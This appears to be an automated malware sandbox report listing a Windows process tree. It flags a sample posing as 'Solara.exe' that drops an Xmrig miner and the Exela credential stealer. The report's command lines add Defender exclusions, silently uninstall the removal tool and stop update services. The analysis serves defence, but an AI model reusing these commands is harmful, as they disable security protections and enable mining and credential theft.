                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:38
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe start "PGYNROQK"
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:39
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:40
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:41
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                                                                                                  Imagebase:0x7ff65d130000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:42
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:43
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:44
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:45
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:46
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:47
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:48
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:49
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:50
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:51
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:52
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:53
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:54
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:55
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:56
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:57
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:58
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:59
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:60
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:61
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:62
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:63
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:64
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:65
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:66
                                                                                                  Start time:01:10:50
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:conhost.exe
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:67
                                                                                                  Start time:01:10:50
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                                                                  Imagebase:0x7ff6284a0000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:68
                                                                                                  Start time:01:10:50
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:69
                                                                                                  Start time:01:10:50
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:72
                                                                                                  Start time:01:10:53
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                                                                  Imagebase:0x7ff6284a0000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:73
                                                                                                  Start time:01:10:53
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:74
                                                                                                  Start time:01:10:53
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:75
                                                                                                  Start time:01:10:59
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                                                                  Imagebase:0x7ff6284a0000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:76
                                                                                                  Start time:01:11:04
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                                                                                                  Imagebase:0x7ff75ae90000
                                                                                                  File size:9'949'634 bytes
                                                                                                  MD5 hash:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 47%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:77
                                                                                                  Start time:01:11:05
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                                                                                                  Imagebase:0x7ff75ae90000
                                                                                                  File size:9'949'634 bytes
                                                                                                  MD5 hash:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2087167617.0000019BB60C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:78
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:79
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:80
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

